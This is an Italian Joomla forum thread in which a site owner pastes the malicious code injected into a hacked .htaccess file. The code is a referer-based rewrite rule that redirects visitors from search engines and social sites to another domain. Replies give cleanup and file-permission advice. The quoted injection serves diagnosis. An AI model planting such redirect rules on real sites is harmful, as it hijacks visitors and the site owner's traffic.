[2.5] Presenza malware, .htaccess hackerato!

felino

[2.5] Presenza malware, .htaccess hackerato!

Salve utenti,scrivo in merito al seguente lagazzettarossazzurra . it

E' stato modificato il file .htaccess, nonostante l'abbia ripulito ieri, oggi è di nuovo stato modificato.
Avete qualche suggerimento? Può esserci la presenza di qualche record in qualche tabella?

Il codice presente è questo:
#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.(abacho | abizdirectory | about | acoon | alexana | allesklar | allpages | allthesites | alltheuk | alltheweb | altavista | america | amfibi | aol | apollo7 | aport | arcor | ask | atsearch | baidu | bellnet | bestireland | bhanvad | bing | blog | bluewin | botw | brainysearch | bricabrac | browseireland | chapu | claymont | click4choice | clickey | clickz | clush | confex | cyber-content | daffodil | devaro | dmoz | dogpile | ebay | ehow | eniro | entireweb | euroseek | exalead | excite | express | facebook | fastbot | filesearch | findelio | findhow | finditireland | findloo | findwhat | finnalle | finnfirma | fireball | flemiro | flickr | freenet | friendsreunited | galaxy | gasta | gigablast | gimpsy | globalsearchdirectory | goo | google | goto | gulesider | hispavista | hotbot | hotfrog | icq | iesearch | ilse | infoseek | ireland-information | ixquick | jaan | jayde | jobrapido | kataweb | keyweb | kingdomseek | klammeraffe | km | kobala | kompass | kpnvandaag | kvasir | libero | limier | linkedin | live | liveinternet | lookle | lycos | mail | mamma | metabot | metacrawler | metaeureka | mojeek | msn | myspace | netscape | netzindex | nigma | nlsearch | nol9 | oekoportal | openstat | orange | passagen | pocketflier | qp | qq | rambler | rtl | savio | schnellsuche | search | search-belgium | searchers | searchspot | sfr | sharelook | simplyhired | slider | sol | splut | spray | startpagina | startsiden | sucharchiv | suchbiene | suchbot | suchknecht | suchmaschine | suchnase | sympatico | telfort | telia | teoma | terra | the-arena | thisisouryear | thunderstone | tiscali | t-online | topseven | twitter | ukkey | uwe | verygoodsearch | vkontakte | voila | walhello | wanadoo | web | webalta | web-archiv | webcrawler | websuche | westaustraliaonline | wikipedia | wisenut | witch | wolong | ya | yahoo | yandex | yell | yippy | youtube | zoneru).(.)
RewriteRule ^(.*)$ link ad un sito .it [R=301,L]
</IfModule>

#/336988#

ZioPal

Ciao felino,
dopo aver ripristinato il file .htaccess hai abbassato tutti i permessi almeno per quel file? Hai cambiato le password? Se ti hanno bucato queste sono le prime cose che devi fare poi se passano ancora comincia a pensare che possano aver accesso al DB.

Maurizio ZioPal
PS Metti sempre la versione joomla del sito nel titolo, aiuterai gli altri a capire il tuo problema e quindi a trovare soluzioni.

felino

Ciao Dexter, dici di cambiare sia i dati FTP che i dati di Joomla?

Hai ragione, questa è la seconda volta che dimentico di mettere la versione di Joomla usata, comunque è la 2.5.6

Grazie.

ZioPal

Ciao felino,
le password le cambierei comunque, ma mi riferiro ai permessi di scrittutra dei file, in particolare del file .htaccess che metterei, a questo punto a 444.

Se non sei sicuro di come gestire i permessi prima fai riferimento all'hosting provider.

Maurizio ZioPal

felino

Cambiare i permessi non è un problema.

Oltre per il file .htaccess, a quale altro file mi consigli di cambiarli?

Grazie.

ZioPal

Teoricamente non dovresti cambiarne nessuno, cartelle a 755 e file a 644, visto però che ti hanno bucato porterei a 444 .htaccess e il configuration.php. Il configuration.php potrebbe essere fastidioso a 444 se stai ancora facendo modifiche al sito.

Maurizio ZioPal

felino

il configuration non è stato toccato, bensì lo script è stato inserito in tutte i file index.php di tutti i templates presenti!